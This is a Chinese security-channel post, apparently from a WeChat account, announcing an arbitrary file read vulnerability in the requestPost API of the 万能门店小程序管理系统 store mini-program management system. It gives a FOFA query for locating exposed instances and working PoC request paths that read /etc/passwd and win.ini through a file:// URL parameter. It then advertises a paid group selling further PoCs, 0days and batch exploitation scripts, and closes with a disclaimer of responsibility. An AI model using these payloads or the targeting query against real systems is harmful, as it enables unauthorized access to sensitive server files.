漏洞推送|万能门店小程序管理系统 requestPost存在任意文件读取漏洞

小白菜安全 小白菜安全 2024-11-28 14:07

漏洞描述

万能门店小程序管理系统 requestPost存在任意文件读取漏洞，攻击者可以利用此漏洞获取系统敏感信息。

资产信息

fofa:body=”/com/css/head_foot.css” || body=”/com/css/iconfont”

漏洞复现

POC

linux:/api/wxapps/_requestPost?data=1&url=file:///etc/passwd
windows:/api/wxapps/_requestPost?data=1&url=file://C:\Windows\win.ini

---

更多漏洞poc（包括0day漏洞）、安全工具、批量脚本加入内部圈子获取，目前只要49，无理由3天退款，加入圈子请扫描下方二维码。

漏洞文库：

工具收集：

脚本文库：

免责声明

该公众号主要是分享互联网上公开的一些漏洞poc和工具，
利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，本公众号及作者不为此承担任何责任，一旦造成后果请自行承担！如果本公众号分享导致的侵权行为请告知，我们会立即删除并道歉。